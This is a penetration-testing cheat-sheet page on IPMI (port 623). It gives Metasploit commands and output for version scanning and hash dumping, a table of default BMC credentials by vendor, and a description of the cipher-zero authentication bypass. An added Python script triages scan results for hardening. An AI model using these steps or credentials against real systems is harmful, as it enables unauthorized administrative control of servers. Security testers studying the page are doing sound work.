623 - IPMI

Intelligent Platform Management Interface (IPMI) is a set of computer interface specifications for an autonomous computer subsystem that provides management and monitoring capabilities independently of the host system's CPU, firmware, and operating system.

Metasploit

Find version

msf > use auxiliary/scanner/ipmi/ipmi_version
msf auxiliary(ipmi_version) > set RHOSTS 10.0.0.0/24
msf auxiliary(ipmi_version) > run
[*] Sending IPMI requests to 10.0.0.0->10.0.0.255 (256 hosts)
[+] 10.0.0.22:623 - IPMI - IPMI-2.0 UserAuth(auth_user,non_null_user) PassAuth(md5,md2)Level(1.5,2.0)
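
For hardening reviews, the scanner output above can be triaged per host. The following is an added example, not part of the original page or of Metasploit: it parses result lines in the format shown and lists the advertised settings worth fixing. The token names `null_user`, `anonymous_user`, `password` and `null`, and the second sample host, are assumptions that do not appear in the page's output.

```python
import re

# Constructed sample: line 2 is the page's output, line 3 is invented for illustration.
SAMPLE = """\
[*] Sending IPMI requests to 10.0.0.0->10.0.0.255 (256 hosts)
[+] 10.0.0.22:623 - IPMI - IPMI-2.0 UserAuth(auth_user,non_null_user) PassAuth(md5,md2)Level(1.5,2.0)
[+] 10.0.0.23:623 - IPMI - IPMI-2.0 UserAuth(auth_user, null_user) PassAuth(password, md5) Level(1.5, 2.0)
"""

LINE_RE = re.compile(r"^\[\+\]\s+(?P<host>\S+):(?P<port>\d+)\s.*?IPMI-(?P<ver>[\d.]+)")
FIELD_RE = re.compile(r"(UserAuth|PassAuth|Level)\(([^)]*)\)")

# Assumption: token names other than those in the page's output line.
RISKY_USER = {"null_user": "login with an empty username is enabled",
              "anonymous_user": "anonymous login is enabled"}
WEAK_PASS = {"md2": "obsolete MD2-based authentication offered",
             "md5": "MD5-based authentication offered",
             "password": "straight password authentication sends the secret unhashed",
             "null": "sessions without authentication are accepted"}

def parse_line(line):
    """Return a dict for one '[+]' result line, or None for any other line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    fields = {name: [t.strip() for t in body.split(",") if t.strip()]
              for name, body in FIELD_RE.findall(line)}
    return {"host": m["host"], "port": int(m["port"]), "version": m["ver"],
            "user_auth": fields.get("UserAuth", []),
            "pass_auth": fields.get("PassAuth", []),
            "levels": fields.get("Level", [])}

def findings(rec):
    """List hardening items for one parsed BMC record."""
    out = [f"UserAuth {t}: {RISKY_USER[t]}" for t in rec["user_auth"] if t in RISKY_USER]
    out += [f"PassAuth {t}: {WEAK_PASS[t]}" for t in rec["pass_auth"] if t in WEAK_PASS]
    if "2.0" in rec["levels"]:
        out.append("Level 2.0: password hashes can be collected remotely (see Dump hashes); "
                   "use long random passwords and keep port 623 on a management VLAN")
    return out

def triage(text):
    """Map each responding host to its hardening items."""
    recs = filter(None, map(parse_line, text.splitlines()))
    return {r["host"]: findings(r) for r in recs}

if __name__ == "__main__":
    for host, items in triage(SAMPLE).items():
        print(host, *items, sep="\n  - ")
```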

Dump hashes

use auxiliary/scanner/ipmi/ipmi_dumphashes 
set rhosts [TARGETS] 
run 

Common default credentials

| Product Name | Default Username | Default Password |
| --- | --- | --- |
| HP Integrated Lights Out (iLO) | Administrator | <factory randomized 8-character string> |
| Dell Remote Access Card (iDRAC, DRAC) | root | calvin |
| IBM Integrated Management Module (IMM) | USERID | PASSW0RD (with a zero) |
| Fujitsu Integrated Remote Management Controller | admin | admin |
| Supermicro IPMI (2.0) | ADMIN | ADMIN |
| Oracle/Sun Integrated Lights Out Manager (ILOM) | root | changeme |
| ASUS iKVM BMC | admin | admin |

Resources: https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/

Zero cipher authentication bypass

Zero cipher authentication bypass resulting in administrative access

Check if vulnerable

Connect

The Linux ipmitool client is used to interact with the service and bypass authentication (via the -C 0 option).

We will set the root user account password to abc123 via IPMI.
